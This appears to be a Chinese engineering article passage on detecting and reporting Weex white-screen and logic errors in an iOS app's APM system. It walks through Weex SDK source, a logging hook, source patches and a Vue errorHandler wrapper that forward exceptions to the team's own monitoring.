这种情况就属于页面部分白屏。因为某个哪个 Compoent 会铺满页面,基本类似 iOS UI 控件一样组合使用。就像上文描述的「该页面大部分在展示商品价格、商品数量、商品折扣价、商品折扣信息、下面应该是有个“确认支付”按钮,但是此处就是空白」这个空白粗,理应显示一个 Native 注册的 Button,但是没有显示出来,造成业务的阻塞。

WeexComponentRegisterError.png .vue(或 Weex 专属.we)文件内基于 Vue 扩展的 Weex 跨平台模板 DSL 代码,在前端构建阶段会先由 Webpack 的weex-loader触发编译流程:首先通过 Weex 核心编译器@weex-cli/compiler(复用并扩展vue-template-compiler)将模板 DSL 解析为模板 AST(抽象语法树);接着由 Weex 自定义 Babel 插件(如babel-plugin-transform-weex-template)将模板 AST 转换为标准化的 JS AST,并针对 iOS/Android 跨平台特性做属性、样式、事件的适配处理(如样式单位归一化、事件名标准化);最终生成包含_h(即 Weex 运行时的$createElement,等价于 Vue 的createElement)调用的render函数,该函数会被 Webpack 打包到最终的 Weex JS Bundle 中。

_c('color-button',
  {
    staticStyle: {
      width: "400px",
      height: "40px",
      marginBottom: "20px"
    },
    attrs: {
      "title": "点击计算10+20",
      "bgColor": "#FF6600",
      "message": "hello"
    },
    on: {
      "click": _vm.handleButtonClick
    }
  },
  // 如果有 children 就是 children 信息
)

在 App 运行阶段,Weex 的 JS 引擎(iOS 端为 JSCore、Android 端为 V8)加载 JS Bundle 后,执行组件的render函数,通过调用 _h 函数将模板描述转换为跨平台的虚拟 DOM(VNode),VNode 会被序列化为 JSON 格式,最终通过 JS Bridge 传递给 Native 端(iOS/Android)用于原生视图渲染。

Weex 的 Component 相关逻辑都由 WXComponentManager 负责。页面在构建展示的时候,会调用 _buildComponent 方法,其内部会调用 WXComponentFactory 的能力(configWithComponentName),根据 ComponentName 获取 Component。

configWithComponentName 是 Weex iOS 侧 WXComponentFactory(组件工厂类)的核心方法之一,核心作用是:根据传入的组件名称(如 color-button/div/text),查找该组件对应的 Native 侧配置(WXComponentConfig);若找不到对应配置,则降级使用基础容器组件 div 的默认配置,并输出警告日志。

- (WXComponentConfig *)configWithComponentName:(NSString *)name
{
    WXAssert(name, @"Can not find config for a nil component name");
    
    WXComponentConfig *config = nil;
    
    [_configLock lock];
    config = [_componentConfigs objectForKey:name];
    if (!config) {
        WXLogWarning(@"No component config for name:%@, use default config", name);
        config = [_componentConfigs objectForKey:@"div"];
    }
    [_configLock unlock];
    
    return config;
}

UI Component 做的比较随意,认为显示问题降级用 div 就可以了。做为 SDK 这么设计也似乎可以接受,但作为业务方,我们必须收集统计这种异常情况。 所以此处我们可以收集案发现场数据,进行上报。我们发现 Weex 自己封装了 WXExceptionUtils类,暴露了 commitCriticalExceptionRT 接口,用于收集致命问题。

+ (void)commitCriticalExceptionRT:(WXJSExceptionInfo *)jsExceptionInfo{
    
    WXPerformBlockOnComponentThread(^ {
        id<WXJSExceptionProtocol> jsExceptionHandler = [WXHandlerFactory handlerForProtocol:@protocol(WXJSExceptionProtocol)];
        if ([jsExceptionHandler respondsToSelector:@selector(onJSException:)]) {
            [jsExceptionHandler onJSException:jsExceptionInfo];
        }
        if ([WXAnalyzerCenter isOpen]) {
            [WXAnalyzerCenter transErrorInfo:jsExceptionInfo];
        }
    });
}

可以看到会判断是否存在可以处理 exception 遵循 WXJSExceptionProtocol 的 handler。所以我们新增一个 WXExceptionReporter 类(遵循 WXJSExceptionProtocol 协议),用于收集异常,然后用于统一的上报,内部提供基础数据的组装、字段解析功能。

效果如下:

WeexComponentBuildFlow.png

2. 全部白屏

根据 Weex 的工作原理可以知道,页面需要展示肯定要根据 url 去获取 JS Bundle 内容,然后解析成 VNode 最后通过 JSBridge 去调用 Native 的 UI Component 去展示 UI,那么整个流程几个重要的环节都可能出错,导致页面白屏。

1. 资源请求失败

JS Bundle 资源请求失败,存在 Error,此时是无法去展示 Weex 页面的。这种情况就是 HTTP 状态码非200的情况。

每个 Weex 页面都由 WXSDKInstance 负责下载 JS Bundle 资源,所以下载的逻辑在 WXSDKInstance 里。

- (void)_renderWithRequest:(WXResourceRequest *)request options:(NSDictionary *)options data:(id)data; 
{
  _mainBundleLoader.onFinished = ^(WXResourceResponse *response, NSData *data) {

      NSError *error = nil;
      if ([response isKindOfClass:[NSHTTPURLResponse class]] && ((NSHTTPURLResponse *)response).statusCode != 200) {
          error = [NSError errorWithDomain:WX_ERROR_DOMAIN
                                      code:((NSHTTPURLResponse *)response).statusCode
                                  userInfo:@{@"message":@"status code error."}];
          if (strongSelf.onFailed) {
              strongSelf.onFailed(error);
          }
      }
      
      if (error) {
          [WXExceptionUtils commitCriticalExceptionRT:strongSelf.instanceId
                                              errCode:[NSString stringWithFormat:@"%d", WX_KEY_EXCEPTION_JS_DOWNLOAD]
                                              function:@"_renderWithRequest:options:data:"
                                            exception:[NSString stringWithFormat:@"download bundle error :%@",[error localizedDescription]]
                                            extParams:nil];
          return;
      }

      if (!data) {
          NSString *errorMessage = [NSString stringWithFormat:@"Request to %@ With no data return", request.URL];
          WX_MONITOR_FAIL_ON_PAGE(WXMTJSDownload, WX_ERR_JSBUNDLE_DOWNLOAD, errorMessage, strongSelf.pageName);
          [WXExceptionUtils commitCriticalExceptionRT:strongSelf.instanceId
                                              errCode:[NSString stringWithFormat:@"%d", WX_KEY_EXCEPTION_JS_DOWNLOAD]
                                              function:@"_renderWithRequest:options:data:"
                                            exception:errorMessage
                                            extParams:nil];
          return;
      }
  };
}

模拟 JS Bundle 下载错误,效果如下:

WeexJSBundleDownloadFailed.png

下载 JS Bundle 网络请求完成后,如果出现 Error,则会调用 WXExceptionUtils 的能力,将异常交给 WXExceptionReporter 去处理。

WeexJSBundleDownloadFailedAPM.png

2. 资源请求成功,数据为空

还有一种情况就是:**JSBundle 下载请求在 HTTP 层面 “成功完成”(状态码 200),但返回的二进制数据 data 为 nil 或空(长度为 0) **

可能你会好奇,怎么可能有空的 JSBundle,什么场景下会产生这种情况? 凡是正常写代码都符合预期就没有任何 bug 和故障了,所以利用悲观策略,将各种可能出现问题的地方都监控到,因为只要 JSBundle 为空,页面肯定是白屏,对于用户侧来说都是致命的。

  1. 服务器/CDN 返回“空响应”:后端 / CDN 配置异常:请求的 JSBundle URL 有效,HTTP 状态码返回 200,但响应体(Body)为空(比如静态 JS 文件被删除、CDN 缓存失效且源站无数据、后端接口逻辑错误未写入响应内容);
  2. 下载过程中数据传输截断 / 丢失
  • 网络波动:下载请求已收到服务器的 “响应完成” 信号,但数据传输过程中因网络中断、超时等导致 NSData 未完整接收(仅 HTTP 头成功接收,体数据为空);
  • Weex 加载器(mainBundleLoader)异常:加载器在将响应数据转为 NSData 时出现底层错误(如内存不足、数据解码失败),导致 data 被置为 nil。

Mock:将 data 设为 nil。效果如下:

WeexJSBundleParseFailed.png

可以看到 Weex 也会把这种错误进行收集,调用 WXExceptionUtils commitCriticalExceptionRT,所以我们添加的 Analyzer 是可以监控到这种异常的。 效果如下:

WeexJSBundleParseErrorAPM.png

3. 资源请求成功,数据无法解析

还有一种特殊的情况就是:下载的 JSBundle 二进制数据虽非空,但因无法以 UTF-8 编码解码为字符串,导致 Weex 实例无法加载执行该数据,最终页面 UI 无法正常展示。比如下面的情况:

WeexJSbundleEncodingError.png

和上面的情况类似,这种都属于概率较小的问题,但也要监控和预防。

一些可能的情况:

  1. JSBundle 文件编码非 UTF-8。 Weex 要求:JS Bundle 文件必须采用 UTF-8 编码(无 BOM)以保证跨平台兼容性,非 UTF-8 编码(如 GBK、UTF-16)可能导致 iOS/Android 平台解析失败
  2. 数据损坏/包含非法 UTF-8 字节
  • 下载截断:UTF-8 是「多字节编码」(比如中文占 3 字节),若下载过程中数据末尾的字符字节不完整(如只下了 2 字节),解码时会因 “字节序列不合法” 失败;
  • 数据篡改:CDN / 网关 / 代理在传输中混入非 UTF-8 字节(如 0xFF、0xFE、0x00 等无效字节),破坏编码结构;
  • 文件损坏:JSBundle 文件打包 / 上传时出错(如压缩后未正确解压),包含乱码 / 二进制碎片
  1. 请求到非文本数据(URL 错误)。请求的 JS Bundle 返回的不是 JS 文本,而是二进制:
  • URL 配置错误:指向图片(png/jpg)、压缩包(zip)、二进制协议数据(如 protobuf)、可执行文件等
  • 后端接口错误:原本应返回 JS 文本的接口,异常时返回二进制格式的错误信息(而非文本错误)
  • 缓存污染:Weex 本地缓存的 JSBundle 被其他二进制文件覆盖(如缓存路径冲突)
  1. 特殊字符/编码溢出
  • JSBundle 中包含 UTF-8 无法表示的「无效 Unicode 码点」(如超出 U+10FFFF 范围,或保留的未定义码点)
  • 数据量过大:极大型 JSBundle 解码时因内存不足 / 系统限制,导致解码接口返回 nil(iOS 中 NSString 对单字符串长度有隐性限制)

这种情况,Weex 官方是怎么做的?

NSString *jsBundleString = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding];
if (!jsBundleString) {
    WX_MONITOR_FAIL_ON_PAGE(WXMTJSDownload, WX_ERR_JSBUNDLE_STRING_CONVERT, @"data converting to string failed.", strongSelf.pageName)
    [strongSelf.apmInstance setProperty:KEY_PROPERTIES_ERROR_CODE withValue:[@(WX_ERR_JSBUNDLE_STRING_CONVERT) stringValue]];
    return;
}

可以看到,这种情况没有被 Weex 没有视为“致命问题”进行上报。只是进行了简单打印。尝试站在框架角度想问题,从 SDK Owner 角度归因:

  • HTTP 状态码错误/无数据:Weex 认为这类错误是「外部不可控故障」(网络、CDN、服务端宕机),会影响大批量实例,属于 “框架级致命异常”,必须通过 WXExceptionUtils 上报(触发全局异常统计、告警)
  • 编码转换失败:可能是分批多次打包,前几次都是 UTF-8 格式,只是这次编码错误,是可以定位的。Weex 认为这类错误是「内部可控问题」(前端打包时未按 UTF-8 规范输出、URL 配置错误指向二进制文件),属于 “业务侧错误”,框架只需记录监控(提醒开发者修复),无需升级为 “框架级致命异常”。

但从业务方角度出发,不光页面是 Weex、Native、Flutter、H5,只要是影响了用户体验,都属于致命问题,尤其这种整个页面都是白屏的情况。所以我们需要修改源码,去上报致命异常。调用 WXExceptionUtils commitCriticalExceptionRT 的能力。

效果如下:

WeexJSBundleEncodingAPM.png

4. 逻辑异常

1. JS 侧 require Module 失败

在 Native [WXSDKEngine registerModule:@"logicCalculation" withClass:[WXLogicCalculationModule class]] 正常注册的 Module,名字叫 logicCalculation。在 js 侧使用的时候不小心写成 const logicCalculation = weex.requireModule('logicCalculation1'),测试又没回归到,问题逃逸到线上,可能就是逻辑问题。Weex 官方的做法就是在 Xcode 打印 log。

WeexModuleRequireError.png

所以作为 APM 侧,我们要定位和收集到该问题,进行问题上报。

想办法知道哪里报错,requireModule 不是原生写法,这肯定是 JS 侧封装的,查看 Weex 源码

WeexRequireModuleError.png

// Weex JS Framework 核心源码(简化)
WeexInstance.prototype.requireModule = function requireModule(moduleName) {
  // 1. 基础校验:Weex实例是否有效(比如是否已销毁)
  var id = getId(this); // 获取当前Weex实例ID
  if (!(id && this.document && this.document.taskCenter)) {
    console.error("[JS Framework] Failed to requireModule(\"" + moduleName + "\"), instance doesn't exist.");
    return;
  }

  // 2. 关键校验:检查Module是否在Native侧注册过
  if (!isRegisteredModule(moduleName)) {
    console.warn("[JS Framework] using unregistered weex module \"" + moduleName + "\"");
    return;
  }

  // 3. 核心:创建Module代理对象(并非真实对象,仅封装桥接调用)
  var moduleProxy = {};
  // 获取该Module在Native侧注册的所有方法(提前从Native同步到JS的方法映射表)
  var moduleMethods = getRegisteredMethods(moduleName);
  
  // 4. 为代理对象绑定方法:调用方法时触发JS-Native桥接
  moduleMethods.forEach(function(methodName) {
    moduleProxy[methodName] = function() {
      // 封装调用参数:实例ID、Module名、方法名、参数、回调
      var args = Array.prototype.slice.call(arguments);
      var callback = null;
      // 提取最后一个参数作为回调(Weex约定)
      if (typeof args[args.length - 1] === 'function') {
        callback = args.pop();
      }
      
      // 5. 核心:通过taskCenter(桥接核心)调用Native
      this.document.taskCenter.sendNative('callNative', {
        instanceId: id,
        module: moduleName,
        method: methodName,
        params: args,
        callback: callback ? generateCallbackId(callback) : null
      });
    }.bind(this);
  }, this);

  // 6. 返回代理对象给JS侧使用
  return moduleProxy;
};
  • 返回的不是真实的 Module 实例,而是代理对象(Proxy) —— 所有方法调用都会被拦截,转而通过桥接发送到 Native;
  • isRegisteredModule 校验:JS 侧会缓存一份「Native 已注册 Module 列表」(Native 初始化时同步到 JS),避免无效桥接。

方案一:Weex 由于安全设计,没办法直接注入 JS。也就是说想通过“切面”思想,hook JS 侧 requireModule 是行不通的。这种方案,代码如下

// 备份原生requireModule方法
const originalRequireModule = WeexInstance.prototype.requireModule;

// 重写requireModule,在错误触发时主动上报Native
WeexInstance.prototype.requireModule = function (moduleName) {
  // 先执行原生判断逻辑
  const id = getId(this);
  if (!(id && this.document && this.document.taskCenter)) {
    const errorMsg = "[JS Framework] Failed to requireModule(\"" + moduleName + "\"), instance (" + id + ") doesn't exist anymore.";
    // 主动上报“实例不存在”错误到Native
    this.document.taskCenter.sendNative('__weex_apm_report', {
      type: 'module_require_failed',
      subType: 'instance_not_exist',
      moduleName: moduleName,
      message: errorMsg,
      instanceId: id
    });
    console.error(errorMsg);
    return;
  }

  // 核心:拦截“未注册Module”判断
  if (!isRegisteredModule(moduleName)) {
    const warnMsg = "[JS Framework] using unregistered weex module \"" + moduleName + "\"";
    // 主动上报“Module未注册”错误到Native(关键)
    this.document.taskCenter.sendNative('__weex_apm_report', {
      type: 'module_not_registered',
      moduleName: moduleName,
      message: warnMsg,
      instanceId: id,
      timestamp: Date.now()
    });
    // 保留原生warn日志(不影响原有逻辑)
    console.warn(warnMsg);
    return;
  }

  // 执行原生逻辑
  return originalRequireModule.call(this, moduleName);
};

方案二:Native 侧拦截 JS 的 console.warn 调用(无 JS 侵入)

写法1:Weex JS 侧的 console.warn 最终会通过 WXBridgeContext 的 handleJSLog 方法传递到 Native,无需解析最终日志,直接 Hook 该方法拦截 warn 信息,精准匹配 Module 未注册错误

#import <objc/runtime.h>

@implementation NSObject (WXJSLogHook)
+ (void)load {
    static dispatch_once_t onceToken;
    dispatch_once(&onceToken, ^{
        // 获取WXBridgeContext类(无需头文件)
        Class bridgeContextClass = NSClassFromString(@"WXBridgeContext");
        if (!bridgeContextClass) return;
        
        // Hook处理JS日志的核心方法:handleJSLog:
        SEL handleJSLogSel = NSSelectorFromString(@"handleJSLog:");
        Method originalMethod = class_getInstanceMethod(bridgeContextClass, handleJSLogSel);
        if (!originalMethod) return;
        
        SEL swizzledSel = NSSelectorFromString(@"weex_apm_handleJSLog:");
        Method swizzledMethod = class_getInstanceMethod(self, swizzledSel);
        class_addMethod(bridgeContextClass, swizzledSel, method_getImplementation(swizzledMethod), method_getTypeEncoding(swizzledMethod));
        method_exchangeImplementations(originalMethod, swizzledMethod);
    });
}

// Hook后的handleJSLog方法:拦截JS侧的warn日志
- (void)weex_apm_handleJSLog:(NSDictionary *)logInfo {
    // 1. 先执行原方法,保留原有日志输出逻辑
    [self weex_apm_handleJSLog:logInfo];
    
    // 2. 解析JS日志信息(logInfo格式:{level: 'warn', msg: 'xxx', ...})
    NSString *logLevel = logInfo[@"level"];
    NSString *logMsg = logInfo[@"msg"];
    
    // 3. 精准匹配“未注册Module”的warn
    if ([logLevel isEqualToString:@"warn"] && [logMsg containsString:@"using unregistered weex module"]) {
        // 提取Module名称
        NSRegularExpression *regex = [NSRegularExpression regularExpressionWithPattern:@"using unregistered weex module \"(.*?)\"" options:0 error:nil];
        NSTextCheckingResult *match = [regex firstMatchInString:logMsg options:0 range:NSMakeRange(0, logMsg.length)];
        NSString *moduleName = match ? [logMsg substringWithRange:match.rangeAtIndex(1)] : @"";
        
        // 4. 构造APM数据上报
        NSDictionary *apmData = @{
            @"error_type": @"weex_module_not_registered",
            @"module_name": moduleName,
            @"message": logMsg,
            @"source": @"js_console_warn", // 标记来源:JS console.warn
            @"timestamp": @([[NSDate date] timeIntervalSince1970] * 1000)
        };
        
        // 调用 APM SDK 接口,数据先落库,后续统一按照数据上报策略,从本地 DB 捞取、聚合、上报
        // [YourAPMManager reportWeexError:apmData];
    }
}
@end

核心优势

  • 无侵入:无需修改 / 注入 JS 代码,纯 Native 侧实现;
  • 精准:拦截的是 JS 侧传递到 Native 的原始日志数据(而非最终打印的字符串),无格式误差;
  • 覆盖全:所有 JS 侧的console.warn都会经过此方法,100% 覆盖 Module 未注册场景

写法二:由于 Weex 代码是大量的存量业务代码,很稳定。而且 Weex 官方好几年不更新,所以我们内部私有化 Weex SDK,也就没有采取 Hook 手段。而是直接修改源码,WXBridgeContext.m+ (void)handleConsoleOutputWithArgument:(NSArray *)arguments logLevel:(WXLogFlag)logLevel 方法。比如:

+ (void)handleConsoleOutputWithArgument:(NSArray *)arguments logLevel:(WXLogFlag)logLevel
{
    NSMutableString *string = [NSMutableString string];
    [string appendString:@"jsLog: "];
    [arguments enumerateObjectsUsingBlock:^(JSValue *jsVal, NSUInteger idx, BOOL *stop) {
        [string appendFormat:@"%@ ", jsVal];
        if (idx == arguments.count - 1) {
            if (logLevel) {
                if (WXLogFlagWarning == logLevel || WXLogFlagError == logLevel) {
                    if ([string containsString:@"using unregistered weex module"]) {
                        // 提取Module名称
                        NSRegularExpression *regex = [NSRegularExpression regularExpressionWithPattern:@"using unregistered weex module \"(.*?)\"" options:0 error:nil];
                        NSTextCheckingResult *match = [regex firstMatchInString:string options:0 range:NSMakeRange(0, string.length)];
                        NSString *moduleName = match ? [string substringWithRange:[match rangeAtIndex:1]] : @"";
                        
                        // 接入收口工具类
                        NSString *exceptionMsg = [NSString stringWithFormat:@"JS require未注册模块:%@,原始日志:%@", moduleName, string];
                        NSDictionary *customExt = @{@"moduleName": moduleName};
                        NSString *instanceId = [WXSDKEngine topInstance].instanceId ?: @"";
                        NSString *bundleUrl = [WXSDKEngine topInstance].scriptURL.absoluteString ?: @"";
                        [[WXExceptionReporter sharedInstance] reportExceptionWithCode:WXCustomExceptionCode_Module_NotRegistered
                                                                        exceptionType:WXCustomExceptionType_Module
                                                                            instanceId:instanceId
                                                                             function:@"handleConsoleOutputWithArgument:logLevel:"
                                                                         exceptionMsg:exceptionMsg
                                                                            bundleUrl:bundleUrl
                                                                         customExtParams:customExt];
                    }
                    
                    id<WXAppMonitorProtocol> appMonitorHandler = [WXSDKEngine handlerForProtocol:@protocol(WXAppMonitorProtocol)];
                    if ([appMonitorHandler respondsToSelector:@selector(commitAppMonitorAlarm:monitorPoint:success:errorCode:errorMsg:arg:)]) {
                        [appMonitorHandler commitAppMonitorAlarm:@"weex" monitorPoint:@"jswarning" success:NO errorCode:@"99999" errorMsg:string arg:[WXSDKEngine topInstance].pageName];
                    }
                }
                WX_LOG(logLevel, @"%@", string);
            } else {
                [string appendFormat:@"%@ ", jsVal];
                WXLogInfo(@"%@", string);
            }
        }
    }];
}

WeexRequireModuleErrorAPM.png

2. JS 调用 Moudle 方法失败

Native 注册了一个负责逻辑的 Module,但是在 JS 侧使用的时候,要么方法名写错了,要么参数少传了,都可能导致预期的逻辑执行错误,发生不符合预期的行为。

1. 点击事件工作原理

核心问题:点击事件发生时,如何根据 Component 的点击事件定位到该 Component 在 Vue DSL 中声明的事件?

第一步:页面初始化时,JS 侧构建事件映射表。 Weex 页面渲染时,会为每个组件做2件事情:

  • 生成组件唯一标识:每个组件都有 ref/componentId/docId,类似组件身份证
  • 绑定事件与方法:解析 @click="handleButtonClick" 时,JS 会将「组件 ID + 事件类型(click)」作为 key,handleButtonClick 作为 value,一起存进组件实例的映射表里,(对应下面的 this.event[type]

第二步:Native 侧捕获点击,携带关键信息调用 fireEvent。 Native 侧能拿到 componentId,是因为渲染组件时,JS 侧会把组件 ID 同步给 Native 渲染引擎(WXComponent),Native 控件和 JS 组件实例通过 ID 一一绑定

第三步:JS 侧调用 fireEvent 方法,其内部通过 ID + 事件类型 找方法。

  • 定位组件实例:JS 通过 componentID(代码里的 this.ref)找到组件实例。
  • 查找事件映射:从组件实例的 this.event 里根据 type (如 click)找到具体的 eventDesc(包含具体的 handler)
  • 发起调用 handler.call
/**
   * Fire an event manually.
   * @param {string} type type
   * @param {function} event handler
   * @param {boolean} isBubble whether or not event bubble
   * @param {boolean} options
   * @return {} anything returned by handler function
   */
  Element.prototype.fireEvent = function fireEvent (type, event, isBubble, options) {
    var result = null;
    var isStopPropagation = false;
    var eventDesc = this.event[type];
    if (eventDesc && event) {
      var handler = eventDesc.handler;
      event.stopPropagation = function () {
        isStopPropagation = true;
      };
      if (options && options.params) {
        result = handler.call.apply(handler, [ this ].concat( options.params, [event] ));
      }
      else {
        result = handler.call(this, event);
      }
    }

    if (!isStopPropagation
      && isBubble
      && (BUBBLE_EVENTS.indexOf(type) !== -1)
      && this.parentNode
      && this.parentNode.fireEvent) {
      event.currentTarget = this.parentNode;
      this.parentNode.fireEvent(type, event, isBubble); // no options
    }

    return result
  };
2. JS 调用 module 方法,方法名错误

Native 注册的 Module 方法名为 multiply:num2:callback:,而在 JS 侧调用的时候方法名多加了几个字符,造成方法名对不上,方法调用失败的问题。

用户点击屏幕上的 UI 控件(此处就是注册 Component [WXSDKEngine registerComponent:@"color-button" withClass:[WXColorButtonComponent class]])。

Weex 统一给 Comonent 添加了分类来负责事件的处理。WXComponent+Events。源码中 addClickEvent 就是添加了点击事件的监听。当发生点击后会计算点击事件的坐标和时间戳信息,最后封装一个 WXCallJSMethod 对象,方法名固定为 fireEvent。如下堆栈所示:

WeexComponentClickLogic.png

由于 logicCalculation 没有对应的 multiplyWith 方法,所以会报错,被 JS 的 try...catch... 捕获后,通过 console.error 的方式输出异常信息。但是 console.error 被 Native 接管了。所以我们可以在 Native 接管的地方统一拦截处理。只要日志包含 Failed to invoke the event handler 就可以认为是因为方法名问题,导致调用方法出错

代码如下:

+ (void)handleConsoleOutputWithArgument:(NSArray *)arguments logLevel:(WXLogFlag)logLevel
{
    // ...
    if ([string containsString:@"Failed to invoke the event handler"]) {
        // 原有解析逻辑保留
                        NSString *errorMethodName = @"";
                        NSString *eventType = @"";
                        NSRegularExpression *regex = [NSRegularExpression regularExpressionWithPattern:@"'\\.\\.\\.(?:logicCalculation\\.)([a-zA-Z0-9_]+)\\.\\.\\." options:0 error:nil];
                        NSTextCheckingResult *match = [regex firstMatchInString:string options:0 range:NSMakeRange(0, string.length)];
                        if (match) {
                            errorMethodName = [string substringWithRange:[match rangeAtIndex:1]];
                        }
                        NSRegularExpression *eventRegex = [NSRegularExpression regularExpressionWithPattern:@"event handler of \"([^\"]+)\"" options:0 error:nil];
                        NSTextCheckingResult *eventMatch = [eventRegex firstMatchInString:string options:0 range:NSMakeRange(0, string.length)];
                        if (eventMatch) {
                            eventType = [string substringWithRange:[eventMatch rangeAtIndex:1]];
                        }
                        
                        // 接入收口工具类
                        NSString *exceptionMsg = [NSString stringWithFormat:@"Module方法名错误:%@,事件类型:%@,原始日志:%@", errorMethodName, eventType, string];
                        NSDictionary *customExt = @{
                            @"moduleName": @"logicCalculation",
                            @"methodName": errorMethodName,
                            @"eventType": eventType
                        };
                        NSString *instanceId = [WXSDKEngine topInstance].instanceId ?: @"";
                        NSString *bundleUrl = [WXSDKEngine topInstance].scriptURL.absoluteString ?: @"";
                        [[WXExceptionReporter sharedInstance] reportExceptionWithCode:WXCustomExceptionCode_Module_MethodNotFound
                                                                         exceptionType:WXCustomExceptionType_Module
                                                                            instanceId:instanceId
                                                                              function:@"handleConsoleOutputWithArgument:logLevel:"
                                                                         exceptionMsg:exceptionMsg
                                                                             bundleUrl:bundleUrl
                                                                         customExtParams:customExt];
    }
    // ...
}

效果如下

WeexCallModuleMethodNameMismatch.png

3. JS 调用 module 方法,方法参数个数不匹配

上面已经讲了点击事件的工作流程,调用方法时,除了调用了不存在的方法或者方法名写错了,还有一种情况就是参数个数不匹配。

这种情况如何识别并监控? JS 的事件处理函数里,调用注册的 Module 和对应的方法,会统一走到 WXJSCoreBridge.mm- (void)registerCallNativeModule:(WXJSCallNativeModule)callNativeModuleBlock 给当前的 JSContext 注册好的 callNativeModule 回调里。_jsContext[@"callNativeModule"] = ^JSValue *(JSValue *instanceId, JSValue *moduleName, JSValue *methodName, JSValue *args, JSValue *options) 可以拿到模块名、方法名、参数个数、instanceID 等。拿到实际传递的方法参数列表,再通过模块名根据 ModuleFactory 找到模块类对象,然后利用 runtime 能力,遍历类对象的方法列表,找到对应的 SEL,判断其预期的方法参数个数,然后再和实际传递过来的方法参数个数做比较即可

- (void)registerCallNativeModule:(WXJSCallNativeModule)callNativeModuleBlock
{
    // JS 调用 Native 的方法都会走这里。可以解析到:模块名、方法名、参数数组等信息。可以在这里判断方法参数个数是否相同。
    _jsContext[@"callNativeModule"] = ^JSValue *(JSValue *instanceId, JSValue *moduleName, JSValue *methodName, JSValue *args, JSValue *options) {
        // ...
    };
}

在其 callNativeModule 的 block 里,增加一个方法,专门用来判断和检查方法参数个数是否匹配的问题

// 辅助方法:校验Module方法参数个数
- (void)checkModuleParamCount:(NSString *)moduleName
                   methodName:(NSString *)methodName
                 actualParams:(NSArray *)actualParams
                   instanceId:(NSString *)instanceId {
    // 1. 跳过空值/系统模块(避免无意义校验)
    if (!moduleName || !methodName || actualParams.count < 0) return;
    Class moduleClass = [WXModuleFactory classWithModuleName:moduleName];
    if (!moduleClass) return;

    // 2. 拼接完整的方法选择器(Weex Module方法名带冒号,需补全,如multiply→multiply:num2:callback:)
    // 注:若方法名规则固定,可通过模块类的方法列表获取所有selector,匹配前缀
    SEL targetSel = nil;
    unsigned int methodCount = 0;
    Method *methods = class_copyMethodList(moduleClass, &methodCount);
    for (int i = 0; i < methodCount; i++) {
        Method method = methods[i];
        SEL sel = method_getName(method);
        NSString *selStr = NSStringFromSelector(sel);
        // 匹配前缀(如multiply开头的方法)
        if ([selStr hasPrefix:methodName]) {
            targetSel = sel;
            break;
        }
    }
    free(methods);
    if (!targetSel) return;

    // 3. 解析方法签名,计算预期参数个数(减self/_cmd)
    NSMethodSignature *methodSig = [moduleClass instanceMethodSignatureForSelector:targetSel];
    NSInteger weexParamCount = methodSig.numberOfArguments - 2;

    // 4. 判断参数个数是否不匹配
    if (actualParams.count != weexParamCount) {
        // 构造错误信息
        NSString *errorMsg = [NSString stringWithFormat:@"Module:%@ 方法:%@ 参数个数不匹配,预期%ld个,实际%ld个",
                              moduleName, methodName, weexParamCount, actualParams.count];
        WXLogError(@"[WeexParamError] %@", errorMsg);

        // 5. 上报APM(核心:生产环境监控)
        NSDictionary *apmData = @{
            @"error_type": @"weex_module_param_count_mismatch",
            @"module_name": moduleName,
            @"method_name": methodName,
            @"expected_count": @(weexParamCount),
            @"actual_count": @(actualParams.count),
            @"actual_params": actualParams,
            @"instance_id": instanceId ?: @"",
            @"timestamp": @([[NSDate date] timeIntervalSince1970] * 1000),
            @"message": errorMsg
        };

        // APM:异步上报,避免阻塞JS桥接
        NSLog(@"APM 数据上报通道,【JS 通过 Module 调用 Native 方法,参数个数不匹配】:%@", apmData);
    }
}

效果如下:

WeexCallNativeModuleParamsError.png

5. Vue 层面异常

Weex 底层依靠 Vue 实现,差异化就是 VM 去通过 Bridge 在 WeexSDK Native 去做绘制。异常方面除了常规的 JS 运行时异常(如语法错误、类型错误等 7 种),Vue 框架自身的逻辑层、编译层、响应式系统、组件生命周期 等环节会抛出专属异常,这些异常必须通过 Vue.config.errorHandler 兜底。

分析 Weex 源码中:packages/weex-js-framework/index.js/

function handleError (err, vm, info) {
  if (vm) {
    var cur = vm;
    while ((cur = cur.$parent)) {
      var hooks = cur.$options.errorCaptured;
      if (hooks) {
        for (var i = 0; i < hooks.length; i++) {
          try {
            var capture = hooks[i].call(cur, err, vm, info) === false;
            if (capture) { return }
          } catch (e) {
            globalHandleError(e, cur, 'errorCaptured hook');
          }
        }
      }
    }
  }
  globalHandleError(err, vm, info);
}

function globalHandleError (err, vm, info) {
  if (config.errorHandler) {
    try {
      return config.errorHandler.call(null, err, vm, info)
    } catch (e) {
      logError(e, null, 'config.errorHandler');
    }
  }
  logError(err, vm, info);
}

WeexCaptureVueError.png

源码中 nextTick、Vue.prototype.$emit、callHook、Watcher.prototype.get、Watcher.prototype.run、renderRecyclableComponentTemplate、Vue.prototype._render 等等都调用了 handleError 方法。 Vue 内部对部分异常做了封装/拦截,避免直接冒泡到全局(防止阻断应用整体运行),但会通过 errorHandler 暴露出来。

举个例子,WeexAPM 类可以封装为:

/**
 * APM
 */
class WeexAPM {
  /**
   * 获取当前的叶子节点
   * @param {*} Vue vm
   * @returns 当前组件名称
   */
  formatComponentName (vm) {
    if (vm.$root === vm) return 'root'
    var name = vm._isVue
      ? (vm.$options && vm.$options.name) ||
        (vm.$options && vm.$options._componentTag)
      : vm.name
    return (
      (name ? 'component <' + name + '>' : 'anonymous component') +
      (vm._isVue && vm.$options && vm.$options.__file
        ? ' at ' + (vm.$options && vm.$options.__file)
        : '')
    )
  }

  /**
   * 处理Vue错误提示
   */
  monitor (Vue) {
    if (!Vue) {
      return
    }
    // 错误处理
    Vue.config.errorHandler = (err, vm, info) => {
      let componentName = 'unknown'
      if (vm) {
        componentName = this.formatComponentName(vm)
      }
      let errorInfo = {
        name: err.name,
        reason: err.message,
        callStack: err.stack,
        componentName: componentName,
        info: info,
        level: 'VUE_ERROR'
      }
      try {
        const weexAPMUploader = weex.requireModule('weexAPMUploader')
        weexAPMUploader.uploadException(errorInfo)
      } catch (error) {
        console.error('APMMonitor 能力有问题,请检查是否注册了weexAPMUploader模块' + error)
      }
    }
  }
}

export default WeexAPM

在捕获到 Vue 层面的异常时,可以调用注册好的 weexAPMUploader module 能力,将数据传输到 Native 侧,由 Native 侧进行统一的参数组装,最后调用 APM SDK 的能力进行数据写入数据库、按照策略上报到 APM 服务端进行消费。

